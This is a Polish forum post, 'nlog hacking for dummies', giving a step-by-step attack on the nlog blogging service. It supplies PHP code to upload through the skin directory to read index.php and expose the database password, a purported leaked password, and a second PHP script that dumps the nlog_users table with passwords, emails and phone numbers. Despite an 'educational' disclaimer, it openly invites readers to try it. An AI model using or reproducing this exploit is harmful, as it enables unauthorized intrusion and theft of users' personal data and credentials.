Musisz być zalogowany, aby móc odpowiedzieć. | | nlog hacking for dummies - vincent | lordzik jakis czas temu wskazal na problem braku bezpieczenstwa na nlogu. Nie mam pojecia, czy warp juz naprawil to, czy nie - mam nadzieje, ze tak.
Ponizszy material jest wiec publikowany w celu edukacyjnym, a ja nie biore odpowiedzialnosci za skutki jego wykorzystania.
!!! UWAGA. Poniewaz podwojny cudzyslow powoduje, ze post nie przechodzi, podwojny cudzyslow zostal zastapiony znakiem ^ - zeby dzialalo, wszystkie ^ nalezy zastapic cudzyslowami.
1. wpisujemy do Notatnika lub innego edytora ponizsze:
$fd = fopen ($plik, ^r^);
$contents = fread ($fd, filesize ($plik));
fclose ($fd);
echo ^^;
?>
i zapisujemy jako na przyklad skrypt.php
2. Ladujemy nasz skrypt.php na serwer poprzez jego wrzucenie do katalogu sluzacego do skinow. Znajdujemy, pod jakim adresem lezy. Wywolujemy go z serwera wpisujac jego adres z parametrem ?plik=index.php (czyli: skrypt.php?plik=index.php )
Ten krok wyswietli nam zrodlo kodu php dla strony index i ujawni aktualne haslo do bazy.
3. Gdy juz mamy haslo, ktore, jak donosi moj tajny informator, ostatnio brzmialo 'buyusfuckyou', robimy drugi plik z rozszerzeniem php o tresci:
$connection = mysql_connect(^localhost^, ^nlog^, ^buyusfuckyou^);
$q = ^select * from nlog_users^;
$res = mysql_query ($q);
echo ^^;
while ( $row = mysql_fetch_row ($res) )
{
echo ^^;
for ($i = 0; $i < count($row); $i++)
{
echo ^^.$row[$i].^ | ^;
}
echo ^ ^;
}
echo ^ ^;
mysql_close ();
?>
... zastepujac ewentualnie 'buyusfuckyou' aktualnym haslem.
Podobnie jak poprzedni, poprzez skiny ladujemy go na serwer i wywolujemy.
Pokaza sie nam wszyscy userzy nloga wraz z ich haslami, adresami e-mail, nr. telefonow (ci co wpisali), iloscia wpisow, lista osob jakie maja w ulubionych, lista zablokowanych adresow i w ogole wszystkimi danymi :). Strona ta moze sie ladowac dlugo.
Powtarzam: to jest podane w celach rozrywkowo-edukacyjnych. Odczekalem dosc czasu po ogloszeniu lordzika, by warp to naprawil. Jesli nie naprawil i powyzszy schemat wciaz dziala i ktos by sie napalil na wyprobowywanie, to pamietajcie o jednym - hackerzy nie niszcza danych. Nie kasujcie innym ich wpisow, nie zmieniajcie hasel, nie wpisujcie sie w ich imieniu. Nie robcie innym nlogowiczom tego, co wam by bylo niemile. Pamietajcie, ze to bylo znane dosc duzemu gronu osob dlugo, a nikomu sie nic z tego powodu nie stalo w jego nloga. :)
| |
|
